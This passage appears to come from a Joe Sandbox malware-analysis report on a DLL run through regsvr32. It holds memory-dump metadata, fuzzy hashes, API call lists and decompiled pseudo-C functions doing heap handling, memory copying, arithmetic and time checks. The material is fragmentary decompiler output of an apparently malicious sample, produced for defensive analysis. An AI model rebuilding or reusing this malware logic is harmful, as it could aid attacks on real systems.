                  0x1800036c4
                  0x1800036c9
                  0x1800036d1
                  0x1800036d7
                  0x1800036dd
                  0x1800036e2
                  0x1800036ea
                  0x1800036ed
                  0x1800036f2
                  0x1800036f9
                  0x1800036ff
                  0x180003707
                  0x180003713
                  0x180003716
                  0x180003725
                  0x180003729
                  0x18000372f
                  0x180003743
                  0x180003754
                  0x180003764
                  0x18000377e

                  APIs
                    • Part of subcall function 0000000180001000: CreateFileW.KERNEL32 ref: 000000018000104A
                    • Part of subcall function 0000000180001000: GetFileSize.KERNEL32 ref: 000000018000105E
                    • Part of subcall function 0000000180001000: CloseHandle.KERNEL32 ref: 00000001800010D9
                    • Part of subcall function 0000000180001000: HeapFree.KERNEL32 ref: 00000001800010F0
                  • HeapAlloc.KERNEL32(?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 00000001800036F9
                  • RtlOemStringToUnicodeString.NTDLL ref: 000000018000371C
                  • RtlNtStatusToDosError.NTDLL ref: 0000000180003729
                  • HeapFree.KERNEL32(?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180003754
                  • HeapFree.KERNEL32(?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180003764
                  Memory Dump Source
                  • Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: Heap$Free$FileString$AllocCloseCreateErrorHandleSizeStatusUnicode
                  • String ID:
                  • API String ID: 45859668-0
                  • Opcode ID: 9076e75a246ab2846ebd8e8eb0ec80191478d5bcc226e42bb9bdcc49be13810a
                  • Instruction ID: f5e01ebc0847fc45ed597bc040b189ed2f2401146e9d5498dfbecc36209ca11f
                  • Opcode Fuzzy Hash: 9076e75a246ab2846ebd8e8eb0ec80191478d5bcc226e42bb9bdcc49be13810a
                  • Instruction Fuzzy Hash: 6D217172218B5881E6A1DB26E44579E73A1FB8CBD4F549521FA8E83768DF38C649CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 67%
                  			E000000011800033B4(void* __eax, void* __edi, void* __eflags, long long __rbx, long long __rcx, long long __rdx, void* __r8, signed int __r9) {
                  				void* __rdi;
                  				void* _t65;
                  				intOrPtr _t66;
                  				void* _t80;
                  				intOrPtr _t88;
                  				intOrPtr _t102;
                  				intOrPtr _t103;
                  				intOrPtr _t107;
                  				signed long long _t109;
                  				void* _t114;
                  				void* _t122;
                  				signed long long _t125;
                  				signed long long _t132;
                  				intOrPtr* _t133;
                  				intOrPtr _t141;
                  				void* _t156;
                  				intOrPtr _t157;
                  				void* _t159;
                  				signed long long _t161;
                  				intOrPtr* _t162;
                  				void* _t165;
                  				void* _t167;
                  				void* _t168;
                  				intOrPtr* _t173;
                  				void* _t181;
                  				signed long long _t183;
                  				signed long long _t184;
                  				int _t187;
                  				int _t189;
                  				void* _t193;
                  
                  				 *((long long*)(_t167 + 0x18)) = __rbx;
                  				 *((long long*)(_t167 + 0x10)) = __rdx;
                  				 *((long long*)(_t167 + 8)) = __rcx;
                  				_t168 = _t167 - 0x660;
                  				_t157 =  *((intOrPtr*)(_t168 + 0x6c0));
                  				r13d = r9d;
                  				r9d =  *((intOrPtr*)(_t168 + 0x6c8));
                  				r9d = r9d - 1;
                  				_t125 = r9d - 1;
                  				if (__eflags < 0) goto 0x80003400;
                  				if ( *((intOrPtr*)(_t157 + _t125 * 4)) == 0) goto 0x800033f1;
                  				_t107 = __r9 + 1;
                  				 *((intOrPtr*)(_t168 + 0x28)) = _t107;
                  				if (_t107 == 0) goto 0x80003641;
                  				_t13 = _t125 + 0x20; // 0x20
                  				r14d = _t13;
                  				if ( *((intOrPtr*)(_t157 + _t125 * 4)) == 0) goto 0x8000342d;
                  				_t114 = 0 - r14d;
                  				if (_t114 >= 0) goto 0x8000342d;
                  				if (_t114 != 0) goto 0x80003422;
                  				r14d = r14d - 1;
                  				r8d = _t107;
                  				 *((intOrPtr*)(_t168 + 0x20)) = r14d;
                  				_t65 = memset(_t193, _t189, _t187);
                  				_t16 = _t168 + 0x250; // 0x249
                  				r9d = r13d;
                  				r8d = r14d;
                  				_t132 = _t187 << 2;
                  				_t66 = E00000001180008AD0(_t65, __edi, _t114, _t132, _t16, __r8, _t157, _t181);
                  				_t17 = _t168 + 0x40; // 0x39
                  				r9d = _t107;
                  				 *((intOrPtr*)(_t168 + _t132 + 0x250)) = _t66;
                  				E00000001180008AD0(_t66, __edi, _t114, _t132, _t17, _t157, _t157, _t156);
                  				_t102 =  *((intOrPtr*)(_t168 + 0x40 + _t161 * 4));
                  				 *((intOrPtr*)(_t168 + 0x24)) = _t102;
                  				memset(_t165, ??);
                  				r13d = r13d - _t107;
                  				_t141 = _t107;
                  				_t183 = r13d;
                  				 *(_t168 + 0x30) = _t183;
                  				if (_t114 < 0) goto 0x800035ee;
                  				_t126 = _t183 + _t141;
                  				_t28 = _t183 * 4; // 0x249
                  				_t162 = _t168 + _t28 + 0x250;
                  				r9d = 0xffffffff;
                  				_t31 = _t126 * 4; // 0x249
                  				_t133 = _t168 + _t31 + 0x250;
                  				if (_t102 != r9d) goto 0x800034d0;
                  				_t103 =  *_t133;
                  				goto 0x800034fb;
                  				r8d = _t157 + 1;
                  				_t159 =  >  ? __r9 : (_t183 + _t141 << 0x20) + _t141 + _t183;
                  				_t44 = _t168 + 0x40; // 0x39
                  				_t173 = _t162;
                  				r10d = _t107;
                  				if (_t103 == 0) goto 0x8000357a;
                  				r12d = 0xffffffff;
                  				r9d =  *_t44;
                  				_t88 =  *_t162;
                  				r10d = r10d + r12d;
                  				_t178 = __r9 * _t165;
                  				 *_t173 = _t88;
                  				if (_t88 - r12d <= 0) goto 0x80003548;
                  				goto 0x8000354a;
                  				 *_t173 =  *_t173 - r9d;
                  				if ( *_t173 - r12d - r9d <= 0) goto 0x80003565;
                  				goto 0x80003567;
                  				if (r10d != 0) goto 0x80003517;
                  				_t109 =  *((intOrPtr*)(_t168 + 0x28));
                  				_t184 =  *(_t168 + 0x30);
                  				 *_t133 =  *_t133 - 0 + 0 + r11d;
                  				if ( *_t133 != 0) goto 0x80003595;
                  				_t47 = _t168 + 0x40; // 0x39
                  				r8d = _t109;
                  				_t122 = E000000011800049DC( *_t173, (_t183 + _t141 << 0x20) + _t141 + _t183, _t162, _t47, _t173 + 4);
                  				if (_t122 < 0) goto 0x800035ae;
                  				_t48 = _t168 + 0x40; // 0x39
                  				r9d = _t109;
                  				 *_t133 =  *_t133 - E00000001180004D74(_t78,  *_t173, 0 + 0 + r11d, (_t183 + _t141 << 0x20) + _t141 + _t183, _t133, _t162, _t162, _t48);
                  				goto 0x8000357c;
                  				 *((intOrPtr*)( *((intOrPtr*)(_t168 + 0x6a0)) + _t184 * 4)) = _t103 + 1;
                  				r13d = r13d - 1;
                  				 *(_t168 + 0x30) = _t184 - 1;
                  				r9d = 0xffffffff;
                  				if (_t122 >= 0) goto 0x800034c7;
                  				r14d =  *((intOrPtr*)(_t168 + 0x20));
                  				r8d =  *((intOrPtr*)(_t168 + 0x6c8));
                  				_t80 = memset(??, ??, ??);
                  				_t57 = _t168 + 0x250; // 0x249
                  				r9d = _t109;
                  				r8d = r14d;
                  				E00000001180007220(_t80,  *((intOrPtr*)(_t168 + 0x24)), _t122, _t133 - 4,  *((intOrPtr*)(_t168 + 0x6a8)), _t57, _t159, _t178, _t161);
                  				r8d = 0x40c;
                  				memset(??, ??, ??);
                  				r8d = 0x204;
                  				return memset(??, ??, ??);
                  			}

































                  0x1800033b4
                  0x1800033b9
                  0x1800033be
                  0x1800033ce
                  0x1800033d5
                  0x1800033dd
                  0x1800033e0
                  0x1800033f1
                  0x1800033f4
                  0x1800033f8
                  0x1800033fe
                  0x180003400
                  0x180003404
                  0x18000340a
                  0x18000341a
                  0x18000341a
                  0x180003420
                  0x180003422
                  0x180003425
                  0x18000342b
                  0x18000342d
                  0x180003430
                  0x180003441
                  0x180003446
                  0x18000344b
                  0x180003456
                  0x180003459
                  0x18000345f
                  0x180003463
                  0x180003468
                  0x18000346d
                  0x180003473
                  0x18000347a
                  0x18000347f
                  0x180003490
                  0x180003494
                  0x180003499
                  0x18000349c
                  0x18000349f
                  0x1800034a2
                  0x1800034a7
                  0x1800034ad
                  0x1800034b1
                  0x1800034b1
                  0x1800034b9
                  0x1800034bf
                  0x1800034bf
                  0x1800034ca
                  0x1800034cc
                  0x1800034ce
                  0x1800034d3
                  0x1800034f7
                  0x1800034fd
                  0x180003505
                  0x180003508
                  0x18000350d
                  0x180003511
                  0x18000351a
                  0x180003520
                  0x180003524
                  0x180003527
                  0x18000353a
                  0x18000353f
                  0x180003546
                  0x18000354a
                  0x18000355c
                  0x180003563
                  0x18000356f
                  0x180003571
                  0x180003575
                  0x18000357a
                  0x18000357f
                  0x180003581
                  0x180003586
                  0x180003591
                  0x180003593
                  0x180003595
                  0x18000359a
                  0x1800035aa
                  0x1800035ac
                  0x1800035be
                  0x1800035c9
                  0x1800035cd
                  0x1800035d5
                  0x1800035db
                  0x1800035e1
                  0x1800035ee
                  0x1800035ff
                  0x180003604
                  0x18000360c
                  0x18000360f
                  0x180003615
                  0x180003624
                  0x18000362a
                  0x180003636
                  0x18000365b

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: memset
                  • String ID:
                  • API String ID: 2221118986-0
                  • Opcode ID: a76d0726cef9ae4b561de819fedaba575e74fa77d35c7135b84bcd3433ab4b61
                  • Instruction ID: ec3f035d16c0e924505bfe3f3cda61bac28d8e6f0fc5c54ff73492b97cc3beba
                  • Opcode Fuzzy Hash: a76d0726cef9ae4b561de819fedaba575e74fa77d35c7135b84bcd3433ab4b61
                  • Instruction Fuzzy Hash: EE61F532704A8486E772CE27E8457DABB95F3D8BC8F448125EE4953B98DF39E605CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: memcmp$FreeHeap
                  • String ID:
                  • API String ID: 1680564963-0
                  • Opcode ID: ebefc488027962227a33868cb32fed72d0b4f2502500ec4154850c2412e11902
                  • Instruction ID: e13f11c4693d54ee7f56904197b6c81cc0d09359d032e1af4ae6464abc78b12e
                  • Opcode Fuzzy Hash: ebefc488027962227a33868cb32fed72d0b4f2502500ec4154850c2412e11902
                  • Instruction Fuzzy Hash: 4551A172B0878955EBA2CB15A4843DA77A1A7AD7C4F54C025EE8C43786EE3DC64DC701
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 43%
                  			E00000001180001EEC(void* __edi, void* __eflags, long long __rbx, long long __rcx, void* __rdx, void* __r8) {
                  				void* __rsi;
                  				void* _t65;
                  				signed int _t66;
                  				unsigned int _t67;
                  				signed int _t74;
                  				void* _t79;
                  				unsigned int _t86;
                  				void* _t88;
                  				void* _t92;
                  				void* _t113;
                  				int _t117;
                  				long long _t123;
                  				void* _t126;
                  				void* _t127;
                  				int _t144;
                  				void* _t146;
                  				void* _t149;
                  
                  				_t79 = __eflags;
                  				_t88 = _t126;
                  				 *((long long*)(_t88 + 0x10)) = __rbx;
                  				 *((long long*)(_t88 + 0x18)) = _t123;
                  				 *((long long*)(_t88 + 8)) = __rcx;
                  				_t127 = _t126 - 0x860;
                  				r14d =  *((intOrPtr*)(_t127 + 0x8b8));
                  				_t92 = __rdx;
                  				 *(_t127 + 0x30) = _t149 << 2;
                  				memcpy(_t149, _t146, _t144);
                  				_t9 = _t127 + 0x454; // 0x4a5
                  				 *((intOrPtr*)(_t127 + 0x20)) = r14d;
                  				E00000001180003934(_t65, __rdx, _t9, _t149 << 2,  *((intOrPtr*)(_t127 + 0x8b0)));
                  				_t13 = _t127 + 0x658; // 0x6a9
                  				 *((intOrPtr*)(_t127 + 0x20)) = r14d;
                  				E00000001180003934(_t65, _t92, _t13, _t149 << 2,  *((intOrPtr*)(_t127 + 0x8b0)));
                  				memset(_t113, _t117);
                  				 *((intOrPtr*)(_t127 + 0x40)) = 1;
                  				_t74 = __edi - 1;
                  				if (_t79 < 0) goto 0x80001faa;
                  				if ( *((intOrPtr*)(__r8 + (r9d - 1) * 4)) == 0) goto 0x80001f9a;
                  				r12d = _t74;
                  				if (_t74 < 0) goto 0x80002081;
                  				_t66 =  *(__r8 + _t74 * 4);
                  				if (_t74 != r12d) goto 0x80001fe8;
                  				if ((_t66 & 0xc0000000) != 0) goto 0x80001fe8;
                  				_t67 = _t66 << 2;
                  				if ((_t67 & 0xc0000000) == 0) goto 0x80001fd2;
                  				if (0x10000001e == 0) goto 0x80002075;
                  				 *((intOrPtr*)(_t127 + 0x20)) = r14d;
                  				E00000001180003934(_t67, _t92, _t127 + 0x40, _t74,  *((intOrPtr*)(_t127 + 0x8b0)));
                  				 *((intOrPtr*)(_t127 + 0x20)) = r14d;
                  				E00000001180003934(_t67, _t92, _t127 + 0x40, _t74,  *((intOrPtr*)(_t127 + 0x8b0)));
                  				_t86 = _t67 >> 0x1e;
                  				if (_t86 == 0) goto 0x80002068;
                  				 *((intOrPtr*)(_t127 + 0x20)) = r14d;
                  				E00000001180003934(_t67, _t92, _t127 + 0x40, _t74,  *((intOrPtr*)(_t127 + 0x8b0)));
                  				if (_t86 != 0) goto 0x80001fef;
                  				if (_t86 >= 0) goto 0x80001fbb;
                  				memcpy(??, ??, ??);
                  				r8d = 0x60c;
                  				memset(??, ??, ??);
                  				r8d = 0x204;
                  				return memset(??, ??, ??);
                  			}




















                  0x180001eec
                  0x180001eec
                  0x180001eef
                  0x180001ef3
                  0x180001ef7
                  0x180001f03
                  0x180001f0a
                  0x180001f22
                  0x180001f2c
                  0x180001f31
                  0x180001f46
                  0x180001f51
                  0x180001f56
                  0x180001f6b
                  0x180001f76
                  0x180001f7b
                  0x180001f8a
                  0x180001f8f
                  0x180001f9a
                  0x180001fa0
                  0x180001fa8
                  0x180001faa
                  0x180001fb5
                  0x180001fbb
                  0x180001fc8
                  0x180001fd0
                  0x180001fd2
                  0x180001fde
                  0x180001fe2
                  0x180002006
                  0x18000200b
                  0x180002027
                  0x18000202c
                  0x180002036
                  0x180002038
                  0x18000205e
                  0x180002063
                  0x18000206f
                  0x18000207b
                  0x180002093
                  0x1800020a2
                  0x1800020a8
                  0x1800020b4
                  0x1800020da

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: memset$memcpy
                  • String ID:
                  • API String ID: 368790112-0
                  • Opcode ID: 9069574d71fd3576152aa11697abaa86dc79558948906a610bfcadaab4521cb1
                  • Instruction ID: c336bcc7fd0d3219ccdcc3e7649660a569ab46c29ccafd654ab2136e7df858a2
                  • Opcode Fuzzy Hash: 9069574d71fd3576152aa11697abaa86dc79558948906a610bfcadaab4521cb1
                  • Instruction Fuzzy Hash: ED416272204BCA95EB61DA12E4443EAB364F7D9BC4F418111FF8857B89DF39C60ACB40
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 42%
                  			E00000001180006108(signed int __rbx, long long __rcx, void* __rdx, void* __r8, char _a8, long long _a16, intOrPtr _a24, intOrPtr _a48, intOrPtr _a56, long long _a64) {
                  				long long _v72;
                  				long long _v88;
                  				void* __rsi;
                  				void* __rbp;
                  				void* __r15;
                  				intOrPtr _t40;
                  				void* _t48;
                  				void* _t57;
                  				void* _t58;
                  				void* _t59;
                  				intOrPtr _t69;
                  				intOrPtr _t71;
                  				intOrPtr* _t75;
                  				signed long long _t92;
                  				void* _t94;
                  				void* _t110;
                  				void* _t112;
                  				intOrPtr* _t114;
                  
                  				_t74 = __rbx;
                  				_a16 = __rbx;
                  				_a8 = __rcx;
                  				_t71 =  *0x8000d4a0;
                  				_t58 = r8d;
                  				_v72 =  *((intOrPtr*)(_t71 + 8));
                  				_t8 = _t92 + 8; // 0x8
                  				r14d = _t8;
                  				HeapAlloc(??, ??, ??);
                  				if (_t71 == 0) goto 0x8000627d;
                  				if (_t58 == 0) goto 0x800061f7;
                  				_t114 = __rdx + 0x20;
                  				E00000001180006008(_t59, __rbx, __rcx, _t94, __rdx + (__rbx + __rbx * 4) * 8);
                  				if (_t71 == 0) goto 0x800061ec;
                  				r9d =  *((intOrPtr*)(_t114 - 8));
                  				_v88 = _t71 + (_t92 + _t92 * 2) * 8;
                  				_a24 = E00000001180006344(_t48, 0, _t71, _t74, _a8, _t71, _t94,  *_t114, _t110, _t112);
                  				HeapFree(??, ??, ??);
                  				_t40 = _a24;
                  				if (_t40 == 0) goto 0x800061ec;
                  				_t57 = 0 + _t40;
                  				if (1 - _t58 < 0) goto 0x80006176;
                  				r14d = 8;
                  				if (1 != _t58) goto 0x80006225;
                  				_v88 = _a64;
                  				r14d = E00000001180007444(_t40, _t57, _t74, _t71, _a48, _a56, _a8);
                  				if (_t57 == 0) goto 0x8000626f;
                  				_t31 =  &_a8; // 0x8
                  				_t75 = _t31;
                  				if ( *_t75 == 0) goto 0x8000624b;
                  				HeapFree(??, ??, ??);
                  				if ( *((intOrPtr*)(_t75 - 8)) == 0) goto 0x80006265;
                  				_t69 =  *((intOrPtr*)(_t75 + 0xc));
                  				if (_t69 == 0) goto 0x80006265;
                  				HeapFree(??, ??, ??);
                  				if (_t69 != 0) goto 0x80006238;
                  				HeapFree(??, ??, ??);
                  				return r14d;
                  			}





















                  0x180006108
                  0x180006108
                  0x18000610d
                  0x180006121
                  0x180006128
                  0x180006148
                  0x18000614d
                  0x18000614d
                  0x180006151
                  0x18000615d
                  0x180006167
                  0x180006172
                  0x180006184
                  0x18000618f
                  0x180006191
                  0x1800061ae
                  0x1800061c0
                  0x1800061c7
                  0x1800061cd
                  0x1800061d6
                  0x1800061e2
                  0x1800061ea
                  0x1800061f1
                  0x1800061f9
                  0x180006218
                  0x180006222
                  0x180006232
                  0x180006234
                  0x180006234
                  0x18000623e
                  0x180006245
                  0x180006252
                  0x180006254
                  0x180006258
                  0x18000625f
                  0x18000626d
                  0x180006277
                  0x180006297

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: Heap$AllocFreelstrlen$Timelstrcatlstrcpy$FileSleepSystem_snprintf
                  • String ID:
                  • API String ID: 2523292596-0
                  • Opcode ID: 32a0b26bd92ab6956d2394037830c20eeece6c9e21b54aa9face044d742a5a88
                  • Instruction ID: d6b07597f5ec485a57081f9d46160005d1067fb2ae4cc7d855a507384812b52f
                  • Opcode Fuzzy Hash: 32a0b26bd92ab6956d2394037830c20eeece6c9e21b54aa9face044d742a5a88
                  • Instruction Fuzzy Hash: E1415E32604B8892EBA2CF56E8447DA77A1F788BC4F48C016EE5D93765DF38C649C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 68%
                  			E00000001180007DBC(void* __ebx, void* __ecx, void* __edx, void* __ebp, void* __eflags, void* __rcx, long long __rdx, long long __r8, signed int _a8, long long* _a16, signed int* _a24, signed int _a32) {
                  				intOrPtr _v80;
                  				void* _v88;
                  				void* _v96;
                  				signed int _v104;
                  				long long _v112;
                  				long long _v120;
                  				void* __rbx;
                  				void* __rsi;
                  				void* __rbp;
                  				signed int _t55;
                  				signed int _t63;
                  				void* _t64;
                  				void* _t73;
                  				signed int _t74;
                  				void* _t75;
                  				void* _t86;
                  				void* _t104;
                  				signed long long _t109;
                  				struct _FILETIME* _t112;
                  				void* _t130;
                  				void* _t131;
                  				long long _t133;
                  				signed int _t134;
                  				void* _t137;
                  				void* _t139;
                  				void* _t149;
                  				void* _t150;
                  				long _t151;
                  				signed int* _t152;
                  				long long _t153;
                  				void* _t155;
                  				signed long long _t157;
                  				void* _t159;
                  
                  				_t150 = _t139;
                  				 *((long long*)(_t150 + 0x18)) = __r8;
                  				 *((long long*)(_t150 + 0x10)) = __rdx;
                  				 *(_t150 + 0x20) =  *(_t150 + 0x20) & 0x00000000;
                  				r14d = 0;
                  				_v104 =  *0x8000d498;
                  				_t131 = __rcx;
                  				 *(_t150 - 0x58) =  *(_t150 - 0x58) & _t157;
                  				if (E00000001180001CB0(__edx, __ebp, _t112, __rcx, _t150 - 0x60, _t137, _t150 + 8, _t159, _t157) == 0) goto 0x80007e19;
                  				_t11 = _t157 + 1; // 0x1
                  				r12d = _t11;
                  				_v96 = _t133;
                  				goto 0x80007e24;
                  				_t134 = _v96;
                  				r12d = 2;
                  				_t14 =  &_a32; // 0xba
                  				_t15 =  &_v88; // 0x42
                  				if (E00000001180008034(r12d, __ebp, _t112, _t131, _t134, _t15, _t14) != 0) goto 0x80007fff;
                  				r8d = _a32;
                  				r13d = r8d;
                  				r13d = r13d - r12d;
                  				_t152 = _v88;
                  				if (_t134 == 0) goto 0x80007e7d;
                  				_t55 = _a8;
                  				_t152[0xa] = 1;
                  				_t152[0x12] = _t134;
                  				_t152[0xd] = _t55;
                  				_t152[0x10] = _t55;
                  				_t24 = _t131 + 0xb0; // 0xb0
                  				r9d = 0;
                  				 *_t152 = _v104 ^ 0x62ade362;
                  				_t152[3] =  *(_t131 + 0x48);
                  				_t152[2] =  *(_t131 + 0x4c);
                  				_t29 =  &_a8; // 0xa2
                  				_v112 = _t29;
                  				_t31 =  &_v104; // 0x32
                  				_v120 = _t31;
                  				_t73 = E0000000118000970C(_t54, __ecx, __ebp, _t86, _t104, _t112, _t24, _t152, _t134, _t15, _t14, _t150);
                  				HeapFree(_t155, _t151, _t130);
                  				if (r13d == 0) goto 0x80007eef;
                  				if (_t73 == 0) goto 0x80007ee4;
                  				if (_t73 != 0x10d2) goto 0x80007eef;
                  				E000000011800023B8(_t112, _t131, _t152, _t134, _t137, _t133, _t137);
                  				if (_t73 != 0) goto 0x80007fff;
                  				_t74 = _a8;
                  				_t153 = _v104;
                  				r13d =  *(_t131 + 0x4c);
                  				_t63 = E00000001180008C48(_t74, _t31, _t153);
                  				_t36 =  &_a8; // 0xa2
                  				r9d = 1;
                  				 *(_t131 + 0x48) = _t74;
                  				 *(_t131 + 0x4c) = _t63;
                  				_t64 = E000000011800099F4(_t74, __ecx, _t74, __ebp, _t112, _t131, _t153, _t134, _t137, _t36, _t149, _t150);
                  				_t75 = _t64;
                  				if (_t64 != 0) goto 0x80007fef;
                  				 *_a16 = _t153;
                  				 *_a24 = _a8;
                  				if ( *(_t131 + 0x4c) != r13d) goto 0x80007f62;
                  				r14d = 1;
                  				if ( *((intOrPtr*)(_t131 + 0x60)) == 0) goto 0x80007fb5;
                  				GetSystemTimeAsFileTime(_t112);
                  				if (r14d == 0) goto 0x80007fa2;
                  				_t109 =  *((intOrPtr*)(_t131 + 0x58));
                  				if (_v80 - _t109 <= 0) goto 0x80007fa2;
                  				_t47 = _t131 + 0xb0; // 0xb0
                  				if (E000000011800045E8(_t75, __ecx, _t112, _t47, _t134, _t137) != 0) goto 0x80007fa2;
                  				asm("lock or dword [edi+0xdc], 0x1");
                  				 *((long long*)(_t131 + 0x58)) = _t109 * 0x23c34600 + _v80;
                  				if (_v96 == 0) goto 0x80007fdc;
                  				HeapFree(??, ??, ??);
                  				if (_t75 == 0) goto 0x80007fd4;
                  				if (_t75 != 0x10d2) goto 0x80007fdc;
                  				E00000001180008BC4(_t112, _t131, _v96);
                  				return _t75;
                  			}




































                  0x180007dbc
                  0x180007dbf
                  0x180007dc3
                  0x180007dde
                  0x180007df5
                  0x180007df8
                  0x180007dfc
                  0x180007dff
                  0x180007e0a
                  0x180007e0e
                  0x180007e0e
                  0x180007e12
                  0x180007e17
                  0x180007e19
                  0x180007e1e
                  0x180007e24
                  0x180007e2c
                  0x180007e40
                  0x180007e46
                  0x180007e4e
                  0x180007e51
                  0x180007e54
                  0x180007e5c
                  0x180007e5e
                  0x180007e65
                  0x180007e6e
                  0x180007e73
                  0x180007e78
                  0x180007e81
                  0x180007e88
                  0x180007e93
                  0x180007e9a
                  0x180007ea2
                  0x180007ea7
                  0x180007eaf
                  0x180007eb4
                  0x180007eb9
                  0x180007ecb
                  0x180007ecd
                  0x180007ed6
                  0x180007eda
                  0x180007ee2
                  0x180007eea
                  0x180007ef1
                  0x180007ef7
                  0x180007efe
                  0x180007f03
                  0x180007f0c
                  0x180007f11
                  0x180007f19
                  0x180007f25
                  0x180007f28
                  0x180007f2b
                  0x180007f30
                  0x180007f34
                  0x180007f4a
                  0x180007f54
                  0x180007f5a
                  0x180007f5c
                  0x180007f66
                  0x180007f6d
                  0x180007f76
                  0x180007f78
                  0x180007f81
                  0x180007f83
                  0x180007f93
                  0x180007f95
                  0x180007fb1
                  0x180007fb8
                  0x180007fc2
                  0x180007fca
                  0x180007fd2
                  0x180007fd7
                  0x180007fee

                  APIs
                    • Part of subcall function 0000000180001CB0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,0000000180007E08), ref: 0000000180001CF3
                    • Part of subcall function 0000000180001CB0: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,0000000180007E08), ref: 0000000180001D1C
                    • Part of subcall function 0000000180001CB0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,0000000180007E08), ref: 0000000180001D77
                  • HeapFree.KERNEL32 ref: 0000000180007ECD
                  • GetSystemTimeAsFileTime.KERNEL32 ref: 0000000180007F6D
                  • HeapFree.KERNEL32 ref: 0000000180007FC2
                  • HeapFree.KERNEL32 ref: 0000000180007FF7
                  Memory Dump Source
                  • Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: Heap$Free$CriticalSectionTime$AllocEnterFileLeaveSystem
                  • String ID:
                  • API String ID: 2852518528-0
                  • Opcode ID: a3f4ae1a574dbd83885b4e74feebd01faf6c5af6d887b4e50d5c00d782bfa35d
                  • Instruction ID: c83ac7b05f0747d7815e629ee238b773506a9670dbf62c2a3b753bc37d6ce7c8
                  • Opcode Fuzzy Hash: a3f4ae1a574dbd83885b4e74feebd01faf6c5af6d887b4e50d5c00d782bfa35d
                  • Instruction Fuzzy Hash: 09619D3270478986E7A6DF26E4447EA73A5F7987C4F408025FE8947755DF38CA59CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: CloseEventFreeHandleHeapSleep
                  • String ID:
